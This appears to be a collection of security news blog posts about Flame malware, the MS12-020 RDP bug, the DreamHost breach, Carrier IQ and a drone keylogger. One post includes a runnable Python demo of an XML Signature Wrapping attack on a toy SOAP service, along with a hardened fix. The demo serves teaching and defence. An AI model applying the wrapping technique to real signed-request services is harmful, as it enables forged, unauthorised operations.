There’s a “new” two-year-old botnet/spy malware that has gone completely undetected until now. How? It just came out of cryogenic sleep, apparently.
Labeled as Flame or Skywiper in some instances, this newly-discovered piece of malware has been called the “industrial vacuum cleaner” of malware. It was discovered by Kaspersky while investigating the Iranian oil industry’s systems and appears to be targeted mostly at the Middle East and Eastern Europe.
The scariest parts are that it went undetected by ANY antivirus or anti-malware product for the entire time it has been around, and the sheer volume of information it collects. The size of this newly discovered malware has been estimated at 20 times that of Stuxnet, and Kaspersky has labeled it the “most complex malware ever.” It is known to collect massive amounts of network traffic, screenshots, documents and audio conversations, and it logs keystrokes on infected systems, making it an extremely dangerous threat to any system it lands on and to the network that system sits in.
It is believed that this is another state-sponsored piece of malware in the ever-escalating cyber war between countries. Any bets on who contracted its creation?
- Cyber-weapon Flame, “most complex malware ever,” identified by Kaspersky Lab (boingboing.net)
- Android Malware Genome Project will catalog, share Android malware (arstechnica.com)
- Flame Cyber ‘Super-Weapon’ Caught Firing On Iran – techweekeurope.co.uk (techweekeurope.co.uk)
- ‘Flame’ cyberespionage worm discovered on thousands of machines across Middle East (theverge.com)
- Stuxnet On Steroids (outsidethebeltway.com)
- ‘Flame,’ a cyberweapon that makes Stuxnet look cheap (wired.com)
- Massive targeted cyber-attack in Middle East uncovered (news.cnet.com)
- The Flame: Questions and Answers (securelist.com)
- Analyst Warns of New ‘Flame’ Cyber Weapon (mashable.com)
- Massive ‘Flame’ Malware Stealing Data Across Middle East (emmageraln.com)
An EXTREMELY critical flaw in Microsoft’s RDP protocol (Remote Desktop) was disclosed and patched by Microsoft today. This vulnerability is about as critical as they get, especially for corporate customers. In short, an unauthenticated attacker who sends specially crafted RDP packets to any computer running Microsoft Windows that has Remote Desktop enabled can essentially take control of it. Because no credentials are needed, the bug is wormable. Microsoft has already released a bulletin about it here (MS12-020).
All users are advised to update their machines as soon as possible, as this nasty bug has the potential to become very nasty, very fast. For machines that cannot be patched immediately, Microsoft’s bulletin lists enabling Network Level Authentication (NLA) as a workaround, and TCP port 3389 should not be reachable from the Internet in any case.
- Microsoft to patch Windows bug called ‘Holy Grail’ by one researcher (networkworld.com)
- KB 2671387 (support.microsoft.com)
- March 2012 Microsoft Black Tuesday, (Tue, Mar 13th) (isc.sans.edu)
- Microsoft Issues Urgent Patch for ‘Wormable’ RDP Vulnerability (pcworld.com)
According to DreamHost’s Status and Blog, staff noticed some unusual activity on one of their databases that held user login information for shell accounts. While the passwords were mostly encrypted, the attacker “found a legacy pool of unencrypted FTP/shell passwords in a database table that we had not previously deleted,” according to DreamHost CEO Simon Anderson.
As a precaution, ALL shell/FTP account passwords were reset by DreamHost. While this causes some inconvenience for users trying to access their sites over SSH/FTP, the implications are much more serious. A lot of CMS systems store their database username and password in plaintext in configuration files (WordPress’s wp-config.php, for example). If whoever gained access to DreamHost’s shell account database managed to decrypt, or simply read, the credentials, they would have unmitigated access not only to sites’ files but potentially (and most likely) to the back-end databases driving those sites, with all of their user data. Note that resetting the shell password does nothing for those database credentials: anyone who has already read a configuration file still has them until the database passwords are rotated as well. This could be a very major breach of user data from one of the largest web hosts in the United States.
DreamHost is being unusually mum about the technical details of the hack and is angering customers over what looks like negligence regarding out-dated server software. While most front-end software is kept up-to-date, their back-end software is grossly outdated, and there appears to be no real effort or care on DreamHost’s part to keep the OS and back-end software patched. What makes things worse is that DreamHost’s official stance on their security is to not disclose what technologies they use. Rather than taking a proactive and relatively transparent stance on their own security systems, the company has taken a reactive, “security through obscurity” stance.
- DreamHost Security Issue Prompts FTP Password Resets (sucuri.net)
- Changing Shell/FTP Passwords due to Security Issue (dreamhoststatus.com)
- Security Update (dreamhost.com)
I first took notice of Carrier IQ when it was discovered by custom ROM developers for the phone I personally own, the Sprint Epic 4G made by Samsung. The device is part of the massively popular Galaxy S line of Android-powered devices that virtually every major cellular carrier in the world sells. Around June, it was discovered that this software records virtually everything a user does with their phone, from each screen tap to every site they visit, to audio and even the physical orientation of the device itself.
A thread (which I now cannot find on XDA-Developers) outlined this “middleware,” and it was surmised that individual carriers like Sprint used it solely for coverage and troubleshooting issues. An effort was undertaken to remove this software from the Android ROM, as it was found to hinder the device’s performance. Developers had a notably difficult time removing Carrier IQ, but eventually managed to strip it from their custom Android ROMs.
Fast forward to fall 2011, when a developer named Trevor Eckhart decided to look into Carrier IQ a bit deeper and found that Carrier IQ was essentially a rootkit that recorded almost all actions performed on a device it was installed on and phoned home with that information. He released a video showing Carrier IQ recording his location with location services turned off, the contents of HTTPS requests (captured on the device before encryption), all SMS messages sent and received, and even EVERY touch he made on the device’s screen.
Essentially, what everything boils down to is that carriers can spy on literally everything you do with your phone. This is obviously a blatant violation of privacy rights, and repercussions are sure to come. Developing…
- Carrier IQ Rootkit Reportedly Logs Everything On Millions Of Phones (pcworld.com)
- You Can Test Your Android For Carrier IQ (Sort Of) [Carrier Iq] (gizmodo.com)
- People Are Freaking Out About Carrier IQ, The Hidden Smartphone Program That Tracks Everything You Do (businessinsider.com)
- Carrier IQ: How To Find It, And How To Deal With It – TechCrunch (techcrunch.com)
- Silicon Alley Insider: RIM: We Do Not Authorize Carrier IQ On BlackBerry Phones (RIMM) (businessinsider.com)
- Verizon: No CarrierIQ, No way (gigaom.com)
- So, there’s a rootkit hidden in millions of cellphones (zdnet.com)
- Phone ‘Rootkit’ Maker Carrier IQ May Have Violated Wiretap Law In Millions Of Cases (textually.org)
NetworkWorld has a very interesting writeup about a report that six German information security researchers published outlining massive and highly exploitable flaws in cloud computing services, specifically Amazon’s EC2 and S3 as well as the Eucalyptus cloud computing software. The attacks rely on old concepts: XSS, and what is referred to as XML Signature Wrapping against the SOAP interfaces of the aforementioned cloud services. In a signature wrapping attack, the signed part of a SOAP request is moved elsewhere in the document and replaced with attacker-chosen content; the signature still verifies because the signed element is still present somewhere, but the service acts on the new, unsigned content. Very troubling and a large blow to the legitimacy of security in the cloud.
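To make the signature wrapping idea concrete, here is a toy reproduction added for this post. It is not the researchers’ code and not Amazon’s real SOAP schema: the service namespace, the operation names, the `Wrapper` header element, the minimal canonicalization routine and the HMAC standing in for an XMLDSig RSA signature are all assumptions chosen so the script runs offline with only the Python standard library. It shows a vulnerable service that resolves the signature’s Reference by Id anywhere in the document but then executes whatever sits at Envelope/Body, and a hardened service that insists the signed element be the very Body it acts on.

```python
"""Toy XML Signature Wrapping (XSW) attack on a SOAP-style, WS-Security-signed request.
Added example; namespaces, operations, HMAC-as-signature and canon() are assumptions."""
import hashlib
import hmac
import xml.etree.ElementTree as ET

SOAP = "http://schemas.xmlsoap.org/soap/envelope/"
DS = "http://www.w3.org/2000/09/xmldsig#"
WSU = "http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd"
API = "urn:example:cloud-api"            # assumed namespace for the service operations
SIGNING_KEY = b"demo-key-not-real"       # HMAC secret standing in for the caller's RSA key


def q(ns, tag):
    return "{%s}%s" % (ns, tag)


ID_ATTR = q(WSU, "Id")


def canon(elem):
    """Tiny deterministic serialization standing in for XML canonicalization (C14N)."""
    attrs = "".join(' %s="%s"' % kv for kv in sorted(elem.attrib.items()))
    kids = "".join(canon(c) for c in elem)
    return "<%s%s>%s%s</%s>" % (elem.tag, attrs, (elem.text or "").strip(), kids, elem.tag)


def digest(elem):
    return hashlib.sha256(canon(elem).encode()).hexdigest()


def build_signed_request(action, instance_id):
    """Legitimate client: sign the Body, referenced through its wsu:Id as WS-Security does."""
    env = ET.Element(q(SOAP, "Envelope"))
    header = ET.SubElement(env, q(SOAP, "Header"))
    body = ET.SubElement(env, q(SOAP, "Body"), {ID_ATTR: "body-1"})
    op = ET.SubElement(body, q(API, action))
    ET.SubElement(op, q(API, "instanceId")).text = instance_id
    sig = ET.SubElement(header, q(DS, "Signature"))
    signed_info = ET.SubElement(sig, q(DS, "SignedInfo"))
    ref = ET.SubElement(signed_info, q(DS, "Reference"), {"URI": "#body-1"})
    ET.SubElement(ref, q(DS, "DigestValue")).text = digest(body)
    mac = hmac.new(SIGNING_KEY, canon(signed_info).encode(), "sha256").hexdigest()
    ET.SubElement(sig, q(DS, "SignatureValue")).text = mac
    return env


def wrap_attack(env, new_action, instance_id):
    """Attacker: keep the signed Body intact (digest unchanged) but park it under the
    Header, then place a fresh, unsigned Body where the service will read it."""
    header, original_body = env.find(q(SOAP, "Header")), env.find(q(SOAP, "Body"))
    env.remove(original_body)
    wrapper = ET.SubElement(header, "Wrapper")   # unknown header child, ignored by lenient services
    wrapper.append(original_body)                # still carries wsu:Id="body-1"
    evil_body = ET.SubElement(env, q(SOAP, "Body"))  # no Id, so no Reference covers it
    op = ET.SubElement(evil_body, q(API, new_action))
    ET.SubElement(op, q(API, "instanceId")).text = instance_id
    return env


def verify_signature(env):
    """Check SignatureValue, then the digest of the element the Reference URI resolves to.
    Resolving the Id anywhere in the document is exactly what XSW exploits."""
    sig = env.find(".//" + q(DS, "Signature"))
    signed_info = sig.find(q(DS, "SignedInfo"))
    expected = hmac.new(SIGNING_KEY, canon(signed_info).encode(), "sha256").hexdigest()
    if not hmac.compare_digest(expected, sig.findtext(q(DS, "SignatureValue")) or ""):
        return False, None
    ref = signed_info.find(q(DS, "Reference"))
    wanted = ref.get("URI")[1:]
    referenced = next((e for e in env.iter() if e.get(ID_ATTR) == wanted), None)
    if referenced is None or digest(referenced) != ref.findtext(q(DS, "DigestValue")):
        return False, None
    return True, referenced


def operation(body):
    op = body[0]
    return op.tag.split("}")[1], op.findtext(q(API, "instanceId"))


def vulnerable_service(env):
    """Signature checked by Id, but the operation is read from Envelope/Body by position."""
    ok, _ = verify_signature(env)
    if not ok:
        raise PermissionError("bad signature")
    return operation(env.find(q(SOAP, "Body")))


def hardened_service(env):
    """Fix: act only on the exact element the signature covers, and require its Id to be unique."""
    ok, referenced = verify_signature(env)
    body = env.find(q(SOAP, "Body"))
    if not ok or referenced is not body:
        raise PermissionError("signature does not cover the Body being processed")
    if sum(1 for e in env.iter() if e.get(ID_ATTR) == body.get(ID_ATTR)) != 1:
        raise PermissionError("ambiguous wsu:Id")
    return operation(body)


def run_demo():
    """What each service executes for a legitimate request and for its wrapped variant."""
    legit = build_signed_request("DescribeInstances", "i-0001")
    wrapped = wrap_attack(build_signed_request("DescribeInstances", "i-0001"),
                          "TerminateInstances", "i-0001")
    try:
        hardened_wrapped = hardened_service(wrapped)
    except PermissionError as exc:
        hardened_wrapped = "rejected: %s" % exc
    return {"vulnerable_legit": vulnerable_service(legit),
            "vulnerable_wrapped": vulnerable_service(wrapped),   # attacker's operation runs
            "hardened_legit": hardened_service(legit),
            "hardened_wrapped": hardened_wrapped}


if __name__ == "__main__":
    for name, result in run_demo().items():
        print(name, result)
```

Running it shows the vulnerable service happily executing `TerminateInstances` under a signature that was only ever made over a `DescribeInstances` body, while the hardened service rejects the same message. The real fix in a production stack is to hand the application the element the signature verifier actually validated (or to verify by position rather than by Id), not to bolt on a second lookup.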
- Researchers Demo Cloud Security Issue With Amazon AWS Attack (pcworld.com)
- Researchers demo cloud security issue with Amazon AWS hijacking attack (infoworld.com)
- Cloud computing: Gaps in the ‘cloud’ (physorg.com)
- Researchers demo cloud security issue with Amazon AWS attack (networkworld.com)
A computer virus has infected the cockpits of America’s Predator and Reaper drones, logging pilots’ every keystroke as they remotely fly missions over Afghanistan and other war zones. The name of the virus is not yet known, as details are still emerging about how the malicious code got into the systems in the first place. Could this be a belligerent enemy of US forces attacking their main weapon for remote regions? Ars Technica has the story after the jump.